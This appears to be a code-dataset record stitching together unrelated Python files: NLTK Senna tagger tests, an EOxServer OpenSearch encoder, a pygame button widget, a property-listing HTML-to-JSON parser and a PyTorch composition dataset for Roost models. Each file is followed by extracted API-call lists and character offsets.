expected = [('Dusseldorf', 'B-NP', 'B-LOC', 'NNP'), ('is', 'B-VP',
'O', 'VBZ'), ('an', 'B-NP', 'O', 'DT'), ('international', 'I-NP',
'O', 'JJ'), ('business', 'I-NP', 'O', 'NN'), ('center', 'I-NP',
'O', 'NN')]
self.assertEqual(result, expected)
@unittest.skipUnless(senna_is_installed, "Requires Senna executable")
class TestSennaTagger(unittest.TestCase):
"""Unittest for nltk.tag.senna"""
def test_senna_tagger(self):
tagger = SennaTagger(SENNA_EXECUTABLE_PATH)
result = tagger.tag('What is the airspeed of an unladen swallow ?'.split())
expected = [('What', 'WP'), ('is', 'VBZ'), ('the', 'DT'), ('airspeed',
'NN'),('of', 'IN'), ('an', 'DT'), ('unladen', 'NN'), ('swallow',
'NN'), ('?', '.')]
self.assertEqual(result, expected)
def test_senna_chunk_tagger(self):
chktagger = SennaChunkTagger(SENNA_EXECUTABLE_PATH)
result_1 = chktagger.tag('What is the airspeed of an unladen swallow ?'.split())
expected_1 = [('What', 'B-NP'), ('is', 'B-VP'), ('the', 'B-NP'), ('airspeed',
'I-NP'), ('of', 'B-PP'), ('an', 'B-NP'), ('unladen', 'I-NP'), ('swallow',
'I-NP'), ('?', 'O')]
result_2 = list(chktagger.bio_to_chunks(result_1, chunk_type='NP'))
expected_2 = [('What', '0'), ('the airspeed', '2-3'), ('an unladen swallow',
'5-6-7')]
self.assertEqual(result_1, expected_1)
self.assertEqual(result_2, expected_2)
def test_senna_ner_tagger(self):
nertagger = SennaNERTagger(SENNA_EXECUTABLE_PATH)
result_1 = nertagger.tag('Shakespeare theatre was in London .'.split())
expected_1 = [('Shakespeare', 'B-PER'), ('theatre', 'O'), ('was', 'O'),
('in', 'O'), ('London', 'B-LOC'), ('.', 'O')]
result_2 = nertagger.tag('UN headquarters are in NY , USA .'.split())
expected_2 = [('UN', 'B-ORG'), ('headquarters', 'O'), ('are', 'O'),
('in', 'O'), ('NY', 'B-LOC'), (',', 'O'), ('USA', 'B-LOC'), ('.', 'O')]
self.assertEqual(result_1, expected_1)
self.assertEqual(result_2, expected_2)
| [
"os.path.exists",
"nltk.classify.Senna",
"nltk.tag.SennaNERTagger",
"nltk.tag.SennaChunkTagger",
"unittest.skipUnless",
"os.path.normpath",
"nltk.tag.SennaTagger"
]
| [((518, 552), 'os.path.exists', 'path.exists', (['SENNA_EXECUTABLE_PATH'], {}), '(SENNA_EXECUTABLE_PATH)\n', (529, 552), False, 'from os import environ, path, sep\n'), ((555, 623), 'unittest.skipUnless', 'unittest.skipUnless', (['senna_is_installed', '"""Requires Senna executable"""'], {}), "(senna_is_installed, 'Requires Senna executable')\n", (574, 623), False, 'import unittest\n'), ((1337, 1405), 'unittest.skipUnless', 'unittest.skipUnless', (['senna_is_installed', '"""Requires Senna executable"""'], {}), "(senna_is_installed, 'Requires Senna executable')\n", (1356, 1405), False, 'import unittest\n'), ((400, 431), 'os.path.normpath', 'path.normpath', (["environ['SENNA']"], {}), "(environ['SENNA'])\n", (413, 431), False, 'from os import environ, path, sep\n'), ((806, 857), 'nltk.classify.Senna', 'Senna', (['SENNA_EXECUTABLE_PATH', "['pos', 'chk', 'ner']"], {}), "(SENNA_EXECUTABLE_PATH, ['pos', 'chk', 'ner'])\n", (811, 857), False, 'from nltk.classify import Senna\n'), ((1537, 1571), 'nltk.tag.SennaTagger', 'SennaTagger', (['SENNA_EXECUTABLE_PATH'], {}), '(SENNA_EXECUTABLE_PATH)\n', (1548, 1571), False, 'from nltk.tag import SennaTagger, SennaChunkTagger, SennaNERTagger\n'), ((1946, 1985), 'nltk.tag.SennaChunkTagger', 'SennaChunkTagger', (['SENNA_EXECUTABLE_PATH'], {}), '(SENNA_EXECUTABLE_PATH)\n', (1962, 1985), False, 'from nltk.tag import SennaTagger, SennaChunkTagger, SennaNERTagger\n'), ((2616, 2653), 'nltk.tag.SennaNERTagger', 'SennaNERTagger', (['SENNA_EXECUTABLE_PATH'], {}), '(SENNA_EXECUTABLE_PATH)\n', (2630, 2653), False, 'from nltk.tag import SennaTagger, SennaChunkTagger, SennaNERTagger\n')] |
#-------------------------------------------------------------------------------
#
# Project: EOxServer <http://eoxserver.org>
# Authors: <NAME> <<EMAIL>>
#
#-------------------------------------------------------------------------------
# Copyright (C) 2015 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#-------------------------------------------------------------------------------
from itertools import chain
from lxml.builder import ElementMaker
try:
from django.core.urlresolvers import reverse
except ImportError:
from django.urls import reverse
from django.shortcuts import get_object_or_404
from eoxserver.core.config import get_eoxserver_config
from eoxserver.core.util.xmltools import (
XMLEncoder, NameSpace, NameSpaceMap
)
from eoxserver.resources.coverages import models
from eoxserver.services.opensearch.formats import get_formats
from eoxserver.services.opensearch.extensions import get_extensions
from eoxserver.services.opensearch.config import OpenSearchConfigReader
class OpenSearch11DescriptionEncoder(XMLEncoder):
content_type = "application/opensearchdescription+xml"
def __init__(self, search_extensions):
ns_os = NameSpace("http://a9.com/-/spec/opensearch/1.1/", None)
self.ns_param = ns_param = NameSpace(
"http://a9.com/-/spec/opensearch/extensions/parameters/1.0/",
"parameters"
)
ns_atom = NameSpace("http://www.w3.org/2005/Atom", "atom")
nsmap = NameSpaceMap(ns_os, ns_param, ns_atom)
for search_extension in search_extensions:
nsmap.add(search_extension.namespace)
self.OS = ElementMaker(namespace=ns_os.uri, nsmap=nsmap)
self.PARAM = ElementMaker(namespace=ns_param.uri, nsmap=nsmap)
self.ATOM = ElementMaker(namespace=ns_atom.uri, nsmap=nsmap)
self.search_extensions = search_extensions
def encode_description(self, request, collection, result_formats):
""" Encode an OpenSearch 1.1 description document.
"""
OS = self.OS
description = OS("OpenSearchDescription",
OS("ShortName",
collection.identifier if collection is not None else ""
),
OS("Description")
)
for method in ("GET", "POST"):
description.extend([
self.encode_url(
request, collection, result_format, method
)
for result_format in result_formats
])
description.extend([
OS("Contact"),
OS("Tags", "CEOS-OS-BP-V1.1/L1"),
OS("LongName"),
OS("Developer"),
OS("Attribution"),
OS("SyndicationRight", "open"),
OS("AdultContent"),
OS("Language"),
OS("InputEncoding"),
OS("OutputEncoding")
])
return description
def encode_url(self, request, collection, result_format, method):
""" Encode a single opensearch URL, either for a specific collection, or
the whole service.
"""
if collection is not None:
search_url = reverse("opensearch:collection:search",
kwargs={
"collection_id": collection.identifier,
"format_name": result_format.name
}
)
else:
search_url = reverse("opensearch:search",
kwargs={
"format_name": result_format.name
}
)
conf = OpenSearchConfigReader(get_eoxserver_config())
search_url = request.build_absolute_uri(search_url)
default_parameters = (
dict(name="q", type="searchTerms", profiles=[
]),
dict(name="count", type="count", min=0, max=conf.max_count),
dict(name="startIndex", type="startIndex", min=0),
)
parameters = list(chain(default_parameters, *[
[
dict(parameter, **{"namespace": search_extension.namespace})
for parameter in search_extension.get_schema(
collection,
models.Collection if collection is None else models.Product
)
] for search_extension in self.search_extensions
]))
query_template = "&".join(
"%s={%s%s%s%s}" % (
parameter["name"],
parameter["namespace"].prefix
if "namespace" in parameter else "",
":" if "namespace" in parameter else "",
parameter["type"],
"?" if parameter.get("optional", True) else ""
)
for parameter in parameters
)
url = self.OS("Url", *[
self.encode_parameter(parameter, parameter.get("namespace"))
for parameter in parameters
],
type=result_format.mimetype,
template="%s?%s" % (search_url, query_template)
if method == "GET" else search_url,
rel="results" if collection is not None else "collection", ** {
self.ns_param("method"): method,
self.ns_param("enctype"): "application/x-www-form-urlencoded",
"indexOffset": "0"
}
)
return url
def encode_parameter(self, parameter, namespace):
options = parameter.pop("options", [])
profiles = parameter.pop("profiles", [])
attributes = {"name": parameter["name"]}
if namespace:
attributes["value"] = "{%s:%s}" % (
namespace.prefix, parameter.pop("type")
)
else:
attributes["value"] = "{%s}" % parameter.pop("type")
if 'min' in parameter:
attributes['minInclusive'] = str(parameter['min'])
if 'max' in parameter:
attributes['maxInclusive'] = str(parameter['max'])
pattern = parameter.get("pattern")
if pattern:
attributes["pattern"] = pattern
return self.PARAM("Parameter", *[
self.PARAM("Option", value=option, label=option)
for option in options
] + [
self.ATOM("link",
rel="profile", href=profile["href"], title=profile["title"]
)
for profile in profiles
], minimum="0" if parameter.get("optional", True) else "1", maximum="1",
**attributes
)
class OpenSearch11DescriptionHandler(object):
def handle(self, request, collection_id=None):
collection = None
if collection_id:
collection = get_object_or_404(models.Collection,
identifier=collection_id
)
encoder = OpenSearch11DescriptionEncoder([
extension() for extension in get_extensions()
])
return (
encoder.serialize(
encoder.encode_description(
request, collection, [format_() for format_ in get_formats()]
)
),
encoder.content_type
)
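# Minimal wiring sketch: turning the handler's (content, content_type) result
# into a Django response. The view function name is illustrative only.
def opensearch_description_view(request, collection_id=None):
    from django.http import HttpResponse
    content, content_type = OpenSearch11DescriptionHandler().handle(request, collection_id)
    return HttpResponse(content, content_type=content_type)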
| [
"eoxserver.core.config.get_eoxserver_config",
"eoxserver.services.opensearch.extensions.get_extensions",
"eoxserver.core.util.xmltools.NameSpaceMap",
"django.shortcuts.get_object_or_404",
"eoxserver.services.opensearch.formats.get_formats",
"django.urls.reverse",
"eoxserver.core.util.xmltools.NameSpace",
"lxml.builder.ElementMaker"
]
| [((2220, 2275), 'eoxserver.core.util.xmltools.NameSpace', 'NameSpace', (['"""http://a9.com/-/spec/opensearch/1.1/"""', 'None'], {}), "('http://a9.com/-/spec/opensearch/1.1/', None)\n", (2229, 2275), False, 'from eoxserver.core.util.xmltools import XMLEncoder, NameSpace, NameSpaceMap\n'), ((2311, 2400), 'eoxserver.core.util.xmltools.NameSpace', 'NameSpace', (['"""http://a9.com/-/spec/opensearch/extensions/parameters/1.0/"""', '"""parameters"""'], {}), "('http://a9.com/-/spec/opensearch/extensions/parameters/1.0/',\n 'parameters')\n", (2320, 2400), False, 'from eoxserver.core.util.xmltools import XMLEncoder, NameSpace, NameSpaceMap\n'), ((2449, 2497), 'eoxserver.core.util.xmltools.NameSpace', 'NameSpace', (['"""http://www.w3.org/2005/Atom"""', '"""atom"""'], {}), "('http://www.w3.org/2005/Atom', 'atom')\n", (2458, 2497), False, 'from eoxserver.core.util.xmltools import XMLEncoder, NameSpace, NameSpaceMap\n'), ((2514, 2552), 'eoxserver.core.util.xmltools.NameSpaceMap', 'NameSpaceMap', (['ns_os', 'ns_param', 'ns_atom'], {}), '(ns_os, ns_param, ns_atom)\n', (2526, 2552), False, 'from eoxserver.core.util.xmltools import XMLEncoder, NameSpace, NameSpaceMap\n'), ((2672, 2718), 'lxml.builder.ElementMaker', 'ElementMaker', ([], {'namespace': 'ns_os.uri', 'nsmap': 'nsmap'}), '(namespace=ns_os.uri, nsmap=nsmap)\n', (2684, 2718), False, 'from lxml.builder import ElementMaker\n'), ((2740, 2789), 'lxml.builder.ElementMaker', 'ElementMaker', ([], {'namespace': 'ns_param.uri', 'nsmap': 'nsmap'}), '(namespace=ns_param.uri, nsmap=nsmap)\n', (2752, 2789), False, 'from lxml.builder import ElementMaker\n'), ((2810, 2858), 'lxml.builder.ElementMaker', 'ElementMaker', ([], {'namespace': 'ns_atom.uri', 'nsmap': 'nsmap'}), '(namespace=ns_atom.uri, nsmap=nsmap)\n', (2822, 2858), False, 'from lxml.builder import ElementMaker\n'), ((4185, 4313), 'django.urls.reverse', 'reverse', (['"""opensearch:collection:search"""'], {'kwargs': "{'collection_id': collection.identifier, 'format_name': result_format.name}"}), "('opensearch:collection:search', kwargs={'collection_id': collection\n .identifier, 'format_name': result_format.name})\n", (4192, 4313), False, 'from django.urls import reverse\n'), ((4435, 4507), 'django.urls.reverse', 'reverse', (['"""opensearch:search"""'], {'kwargs': "{'format_name': result_format.name}"}), "('opensearch:search', kwargs={'format_name': result_format.name})\n", (4442, 4507), False, 'from django.urls import reverse\n'), ((4614, 4636), 'eoxserver.core.config.get_eoxserver_config', 'get_eoxserver_config', ([], {}), '()\n', (4634, 4636), False, 'from eoxserver.core.config import get_eoxserver_config\n'), ((7702, 7764), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['models.Collection'], {'identifier': 'collection_id'}), '(models.Collection, identifier=collection_id)\n', (7719, 7764), False, 'from django.shortcuts import get_object_or_404\n'), ((7887, 7903), 'eoxserver.services.opensearch.extensions.get_extensions', 'get_extensions', ([], {}), '()\n', (7901, 7903), False, 'from eoxserver.services.opensearch.extensions import get_extensions\n'), ((8074, 8087), 'eoxserver.services.opensearch.formats.get_formats', 'get_formats', ([], {}), '()\n', (8085, 8087), False, 'from eoxserver.services.opensearch.formats import get_formats\n')] |
from pygame import Surface, font
from .basewidget import BaseWidget
from frontend import Renderer, WidgetHandler
class Button(BaseWidget):
action = None
def __init__(self, x, y, texto, action=None):
self.f = font.SysFont('Verdana', 16)
imagen = self.crear(texto)
rect = imagen.get_rect(topleft=(x, y))
super().__init__(imagen, rect)
Renderer.add_widget(self, 1)
WidgetHandler.add_widget(self, 1)
self.action = action
def crear(self, texto):
w, h = self.f.size(texto)
image = Surface((w + 4, h + 2))
image.fill((125, 125, 125), (1, 1, w+2, h))
render = self.f.render(texto, 1, (255, 255, 255), (125, 125, 125))
image.blit(render, (2, 1))
return image
def on_mousebuttondown(self, button):
if button == 1 and self.action is not None:
self.action()
def on_mouseover(self):
pass
def update(self):
self.dirty = 1
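# Minimal usage sketch: a button wired to a click callback. Assumes pygame is
# initialized and the frontend Renderer/WidgetHandler groups are already set up;
# the callback below is illustrative only.
if __name__ == '__main__':
    import pygame
    pygame.init()
    def on_click():
        print('boton pulsado')
    boton = Button(20, 20, 'Aceptar', action=on_click)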
| [
"frontend.Renderer.add_widget",
"frontend.WidgetHandler.add_widget",
"pygame.font.SysFont",
"pygame.Surface"
]
| [((227, 254), 'pygame.font.SysFont', 'font.SysFont', (['"""Verdana"""', '(16)'], {}), "('Verdana', 16)\n", (239, 254), False, 'from pygame import Surface, font\n'), ((384, 412), 'frontend.Renderer.add_widget', 'Renderer.add_widget', (['self', '(1)'], {}), '(self, 1)\n', (403, 412), False, 'from frontend import Renderer, WidgetHandler\n'), ((421, 454), 'frontend.WidgetHandler.add_widget', 'WidgetHandler.add_widget', (['self', '(1)'], {}), '(self, 1)\n', (445, 454), False, 'from frontend import Renderer, WidgetHandler\n'), ((563, 586), 'pygame.Surface', 'Surface', (['(w + 4, h + 2)'], {}), '((w + 4, h + 2))\n', (570, 586), False, 'from pygame import Surface, font\n')] |
import glob
import bs4
import gzip
import pickle
import re
import os
from concurrent.futures import ProcessPoolExecutor as PPE
import json
from pathlib import Path
from hashlib import sha256
import shutil
Path('json').mkdir(exist_ok=True)
def sanitize(text):
text = re.sub(r'(\t|\n|\r)', '', text)
text = re.sub(r'\xa0', '', text)
text = re.sub(r'\\r', '', text)
text = re.sub('地図で物件の周辺環境をチェック!', '', text)
return text
def is_train(x):
    # filter out table cells that describe train lines (their text contains '線')
    if '線' in x:
        return False
    else:
        return True
def pmap(arg):
key, fns = arg
SIZE = len(fns)
for index, fn in enumerate(fns):
try:
print('now', key,index, 'size', SIZE, fn)
html = gzip.decompress(open(fn, 'rb').read())
soup = bs4.BeautifulSoup(html, 'lxml')
if soup.find('link', {'rel':'canonical'}) is None:
Path(fn).unlink()
continue
canonical = soup.find('link', {'rel':'canonical'})['href']
if '/detail/' not in canonical:
Path(fn).unlink()
continue
basic_table = soup.find('div', {'class':'detail_basicInfo'})
if basic_table is None:
Path(fn).unlink()
continue
basic_table = basic_table.find('table')
            # handle misaligned table rows
tds = list(basic_table.find_all('td'))
tds.pop(0)
#print(tds.pop(0).text)
tds = [td for td in tds if is_train(td)]
print(len(basic_table.find_all('th')), len(tds))
if len(basic_table.find_all('th')) == 13 and len(tds) == 14:
tds.pop(4)
...
basic_obj = {sanitize(th.text):sanitize(td.text) for th, td in zip(basic_table.find_all('th'),tds)}
detail_obj = {}
for table in soup.find('div', {'class':'detail_specTable'}).find_all('table'):
#print(table)
for th, td in zip(table.find_all('th'), table.find_all('td')):
detail_obj[sanitize(th.text)] = sanitize(td.text)
obj = {'basic':basic_obj, 'detail':detail_obj, 'canonical':canonical, 'title':soup.title.text}
last_fn = fn.split('/')[-1]
shutil.move(fn, f'parsed_htmls/{last_fn}' )
with open(f'json/{last_fn}', 'w') as fp:
fp.write(json.dumps(obj, indent=2, ensure_ascii=False))
except Exception as ex:
#Path(fn).unlink()
print(ex)
#detail_table = soup.find('table', {'class':'bukken_detail_table'})
#detail_obj = {re.sub(r'\t', '', th.text):re.sub(r'(\t|\n)', '', td.text) for th, td in zip(detail_table.find_all('th'), detail_table.find_all('td'))}
#print(detail_obj)
#urls = [sha256(bytes(v, 'utf8')).hexdigest() for v in json.load(fp=open('./hash_url.json')).values()]
#fns = [f'./htmls/{url}' for url in urls]
import random
files = glob.glob('./htmls/*')
random.shuffle(files)
args = {}
for index, fn in enumerate(files):
key = index%8
if args.get(key) is None:
args[key] = []
args[key].append(fn)
args = [(key,fns) for key,fns in args.items()]
#[pmap(arg) for arg in args]
with PPE(max_workers=8) as exe:
exe.map(pmap, args)
| [
"random.shuffle",
"pathlib.Path",
"shutil.move",
"json.dumps",
"bs4.BeautifulSoup",
"concurrent.futures.ProcessPoolExecutor",
"re.sub",
"glob.glob"
]
| [((2929, 2951), 'glob.glob', 'glob.glob', (['"""./htmls/*"""'], {}), "('./htmls/*')\n", (2938, 2951), False, 'import glob\n'), ((2952, 2973), 'random.shuffle', 'random.shuffle', (['files'], {}), '(files)\n', (2966, 2973), False, 'import random\n'), ((273, 306), 're.sub', 're.sub', (['"""(\\\\t|\\\\n|\\\\r)"""', '""""""', 'text'], {}), "('(\\\\t|\\\\n|\\\\r)', '', text)\n", (279, 306), False, 'import re\n'), ((316, 341), 're.sub', 're.sub', (['"""\\\\xa0"""', '""""""', 'text'], {}), "('\\\\xa0', '', text)\n", (322, 341), False, 'import re\n'), ((353, 378), 're.sub', 're.sub', (['"""\\\\\\\\r"""', '""""""', 'text'], {}), "('\\\\\\\\r', '', text)\n", (359, 378), False, 'import re\n'), ((389, 425), 're.sub', 're.sub', (['"""地図で物件の周辺環境をチェック!"""', '""""""', 'text'], {}), "('地図で物件の周辺環境をチェック!', '', text)\n", (395, 425), False, 'import re\n'), ((3196, 3214), 'concurrent.futures.ProcessPoolExecutor', 'PPE', ([], {'max_workers': '(8)'}), '(max_workers=8)\n', (3199, 3214), True, 'from concurrent.futures import ProcessPoolExecutor as PPE\n'), ((207, 219), 'pathlib.Path', 'Path', (['"""json"""'], {}), "('json')\n", (211, 219), False, 'from pathlib import Path\n'), ((764, 795), 'bs4.BeautifulSoup', 'bs4.BeautifulSoup', (['html', '"""lxml"""'], {}), "(html, 'lxml')\n", (781, 795), False, 'import bs4\n'), ((2246, 2288), 'shutil.move', 'shutil.move', (['fn', 'f"""parsed_htmls/{last_fn}"""'], {}), "(fn, f'parsed_htmls/{last_fn}')\n", (2257, 2288), False, 'import shutil\n'), ((2368, 2413), 'json.dumps', 'json.dumps', (['obj'], {'indent': '(2)', 'ensure_ascii': '(False)'}), '(obj, indent=2, ensure_ascii=False)\n', (2378, 2413), False, 'import json\n'), ((875, 883), 'pathlib.Path', 'Path', (['fn'], {}), '(fn)\n', (879, 883), False, 'from pathlib import Path\n'), ((1049, 1057), 'pathlib.Path', 'Path', (['fn'], {}), '(fn)\n', (1053, 1057), False, 'from pathlib import Path\n'), ((1217, 1225), 'pathlib.Path', 'Path', (['fn'], {}), '(fn)\n', (1221, 1225), False, 'from pathlib import Path\n')] |
import functools
import json
from os.path import abspath, dirname, exists, join
from typing import Dict, Sequence
import numpy as np
import pandas as pd
import torch
from pymatgen.core import Composition
from torch.utils.data import Dataset
class CompositionData(Dataset):
def __init__(
self,
df: pd.DataFrame,
task_dict: Dict[str, str],
elem_emb: str = "matscholar200",
inputs: Sequence[str] = ["composition"],
identifiers: Sequence[str] = ["material_id", "composition"],
):
"""Data class for Roost models.
Args:
df (pd.DataFrame): Pandas dataframe holding input and target values.
task_dict (dict[str, "regression" | "classification"]): Map from target names to task
type.
elem_emb (str, optional): One of "matscholar200", "cgcnn92", "megnet16", "onehot112" or
path to a file with custom embeddings. Defaults to "matscholar200".
inputs (list[str], optional): df column name holding material compositions.
Defaults to ["composition"].
identifiers (list, optional): df columns for distinguishing data points. Will be
copied over into the model's output CSV. Defaults to ["material_id", "composition"].
"""
assert len(identifiers) == 2, "Two identifiers are required"
        assert len(inputs) == 1, "Exactly one input column is required"
self.inputs = inputs
self.task_dict = task_dict
self.identifiers = identifiers
self.df = df
if elem_emb in ["matscholar200", "cgcnn92", "megnet16", "onehot112"]:
elem_emb = join(
dirname(abspath(__file__)), f"../embeddings/element/{elem_emb}.json"
)
else:
assert exists(elem_emb), f"{elem_emb} does not exist!"
with open(elem_emb) as f:
self.elem_features = json.load(f)
self.elem_emb_len = len(list(self.elem_features.values())[0])
self.n_targets = []
for target, task in self.task_dict.items():
if task == "regression":
self.n_targets.append(1)
elif task == "classification":
n_classes = np.max(self.df[target].values) + 1
self.n_targets.append(n_classes)
def __len__(self):
return len(self.df)
@functools.lru_cache(maxsize=None) # Cache data for faster training
def __getitem__(self, idx):
"""[summary]
Args:
idx (int): dataset index
Raises:
AssertionError: [description]
ValueError: [description]
Returns:
atom_weights: torch.Tensor shape (M, 1)
weights of atoms in the material
atom_fea: torch.Tensor shape (M, n_fea)
features of atoms in the material
self_fea_idx: torch.Tensor shape (M*M, 1)
list of self indices
nbr_fea_idx: torch.Tensor shape (M*M, 1)
list of neighbor indices
target: torch.Tensor shape (1,)
target value for material
cry_id: torch.Tensor shape (1,)
input id for the material
"""
df_idx = self.df.iloc[idx]
composition = df_idx[self.inputs][0]
cry_ids = df_idx[self.identifiers].values
comp_dict = Composition(composition).get_el_amt_dict()
elements = list(comp_dict.keys())
weights = list(comp_dict.values())
weights = np.atleast_2d(weights).T / np.sum(weights)
try:
atom_fea = np.vstack([self.elem_features[element] for element in elements])
except AssertionError:
raise AssertionError(
f"cry-id {cry_ids[0]} [{composition}] contains element types not in embedding"
)
except ValueError:
raise ValueError(
f"cry-id {cry_ids[0]} [{composition}] composition cannot be parsed into elements"
)
nele = len(elements)
self_fea_idx = []
nbr_fea_idx = []
for i, _ in enumerate(elements):
self_fea_idx += [i] * nele
nbr_fea_idx += list(range(nele))
# convert all data to tensors
atom_weights = torch.Tensor(weights)
atom_fea = torch.Tensor(atom_fea)
self_fea_idx = torch.LongTensor(self_fea_idx)
nbr_fea_idx = torch.LongTensor(nbr_fea_idx)
targets = []
for target in self.task_dict:
if self.task_dict[target] == "regression":
targets.append(torch.Tensor([df_idx[target]]))
elif self.task_dict[target] == "classification":
targets.append(torch.LongTensor([df_idx[target]]))
return (
(atom_weights, atom_fea, self_fea_idx, nbr_fea_idx),
targets,
*cry_ids,
)
def collate_batch(dataset_list):
"""
Collate a list of data and return a batch for predicting crystal
properties.
Parameters
----------
dataset_list: list of tuples for each data point.
(atom_fea, nbr_fea, nbr_fea_idx, target)
atom_fea: torch.Tensor shape (n_i, atom_fea_len)
nbr_fea: torch.Tensor shape (n_i, M, nbr_fea_len)
self_fea_idx: torch.LongTensor shape (n_i, M)
nbr_fea_idx: torch.LongTensor shape (n_i, M)
target: torch.Tensor shape (1, )
cif_id: str or int
Returns
-------
N = sum(n_i); N0 = sum(i)
batch_atom_weights: torch.Tensor shape (N, 1)
batch_atom_fea: torch.Tensor shape (N, orig_atom_fea_len)
Atom features from atom type
batch_self_fea_idx: torch.LongTensor shape (N, M)
Indices of mapping atom to copies of itself
batch_nbr_fea_idx: torch.LongTensor shape (N, M)
Indices of M neighbors of each atom
crystal_atom_idx: list of torch.LongTensor of length N0
Mapping from the crystal idx to atom idx
target: torch.Tensor shape (N, 1)
Target value for prediction
batch_comps: list
batch_ids: list
"""
# define the lists
batch_atom_weights = []
batch_atom_fea = []
batch_self_fea_idx = []
batch_nbr_fea_idx = []
crystal_atom_idx = []
batch_targets = []
batch_cry_ids = []
cry_base_idx = 0
for i, (inputs, target, *cry_ids) in enumerate(dataset_list):
atom_weights, atom_fea, self_fea_idx, nbr_fea_idx = inputs
# number of atoms for this crystal
n_i = atom_fea.shape[0]
# batch the features together
batch_atom_weights.append(atom_weights)
batch_atom_fea.append(atom_fea)
# mappings from bonds to atoms
batch_self_fea_idx.append(self_fea_idx + cry_base_idx)
batch_nbr_fea_idx.append(nbr_fea_idx + cry_base_idx)
# mapping from atoms to crystals
crystal_atom_idx.append(torch.tensor([i] * n_i))
# batch the targets and ids
batch_targets.append(target)
batch_cry_ids.append(cry_ids)
# increment the id counter
cry_base_idx += n_i
return (
(
torch.cat(batch_atom_weights, dim=0),
torch.cat(batch_atom_fea, dim=0),
torch.cat(batch_self_fea_idx, dim=0),
torch.cat(batch_nbr_fea_idx, dim=0),
torch.cat(crystal_atom_idx),
),
tuple(torch.stack(b_target, dim=0) for b_target in zip(*batch_targets)),
*zip(*batch_cry_ids),
)
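# Minimal wiring sketch: plugging the dataset and collate function into a
# PyTorch DataLoader. The dataframe columns/values are illustrative and the
# default matscholar200 element embedding file is assumed to be present.
if __name__ == "__main__":
    from torch.utils.data import DataLoader
    df = pd.DataFrame(
        {
            "material_id": ["mp-1", "mp-2"],
            "composition": ["Fe2O3", "NaCl"],
            "E_f": [-1.23, -0.45],
        }
    )
    dataset = CompositionData(df, task_dict={"E_f": "regression"})
    loader = DataLoader(dataset, batch_size=2, collate_fn=collate_batch)
    inputs, targets, *ids = next(iter(loader))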
| [
"os.path.exists",
"numpy.atleast_2d",
"torch.LongTensor",
"torch.stack",
"torch.Tensor",
"pymatgen.core.Composition",
"numpy.max",
"numpy.sum",
"torch.tensor",
"numpy.vstack",
"json.load",
"functools.lru_cache",
"os.path.abspath",
"torch.cat"
]
| [((2395, 2428), 'functools.lru_cache', 'functools.lru_cache', ([], {'maxsize': 'None'}), '(maxsize=None)\n', (2414, 2428), False, 'import functools\n'), ((4310, 4331), 'torch.Tensor', 'torch.Tensor', (['weights'], {}), '(weights)\n', (4322, 4331), False, 'import torch\n'), ((4351, 4373), 'torch.Tensor', 'torch.Tensor', (['atom_fea'], {}), '(atom_fea)\n', (4363, 4373), False, 'import torch\n'), ((4397, 4427), 'torch.LongTensor', 'torch.LongTensor', (['self_fea_idx'], {}), '(self_fea_idx)\n', (4413, 4427), False, 'import torch\n'), ((4450, 4479), 'torch.LongTensor', 'torch.LongTensor', (['nbr_fea_idx'], {}), '(nbr_fea_idx)\n', (4466, 4479), False, 'import torch\n'), ((1823, 1839), 'os.path.exists', 'exists', (['elem_emb'], {}), '(elem_emb)\n', (1829, 1839), False, 'from os.path import abspath, dirname, exists, join\n'), ((1939, 1951), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1948, 1951), False, 'import json\n'), ((3581, 3596), 'numpy.sum', 'np.sum', (['weights'], {}), '(weights)\n', (3587, 3596), True, 'import numpy as np\n'), ((3634, 3698), 'numpy.vstack', 'np.vstack', (['[self.elem_features[element] for element in elements]'], {}), '([self.elem_features[element] for element in elements])\n', (3643, 3698), True, 'import numpy as np\n'), ((6901, 6924), 'torch.tensor', 'torch.tensor', (['([i] * n_i)'], {}), '([i] * n_i)\n', (6913, 6924), False, 'import torch\n'), ((7138, 7174), 'torch.cat', 'torch.cat', (['batch_atom_weights'], {'dim': '(0)'}), '(batch_atom_weights, dim=0)\n', (7147, 7174), False, 'import torch\n'), ((7188, 7220), 'torch.cat', 'torch.cat', (['batch_atom_fea'], {'dim': '(0)'}), '(batch_atom_fea, dim=0)\n', (7197, 7220), False, 'import torch\n'), ((7234, 7270), 'torch.cat', 'torch.cat', (['batch_self_fea_idx'], {'dim': '(0)'}), '(batch_self_fea_idx, dim=0)\n', (7243, 7270), False, 'import torch\n'), ((7284, 7319), 'torch.cat', 'torch.cat', (['batch_nbr_fea_idx'], {'dim': '(0)'}), '(batch_nbr_fea_idx, dim=0)\n', (7293, 7319), False, 'import torch\n'), ((7333, 7360), 'torch.cat', 'torch.cat', (['crystal_atom_idx'], {}), '(crystal_atom_idx)\n', (7342, 7360), False, 'import torch\n'), ((3407, 3431), 'pymatgen.core.Composition', 'Composition', (['composition'], {}), '(composition)\n', (3418, 3431), False, 'from pymatgen.core import Composition\n'), ((3554, 3576), 'numpy.atleast_2d', 'np.atleast_2d', (['weights'], {}), '(weights)\n', (3567, 3576), True, 'import numpy as np\n'), ((7387, 7415), 'torch.stack', 'torch.stack', (['b_target'], {'dim': '(0)'}), '(b_target, dim=0)\n', (7398, 7415), False, 'import torch\n'), ((1715, 1732), 'os.path.abspath', 'abspath', (['__file__'], {}), '(__file__)\n', (1722, 1732), False, 'from os.path import abspath, dirname, exists, join\n'), ((4626, 4656), 'torch.Tensor', 'torch.Tensor', (['[df_idx[target]]'], {}), '([df_idx[target]])\n', (4638, 4656), False, 'import torch\n'), ((2253, 2283), 'numpy.max', 'np.max', 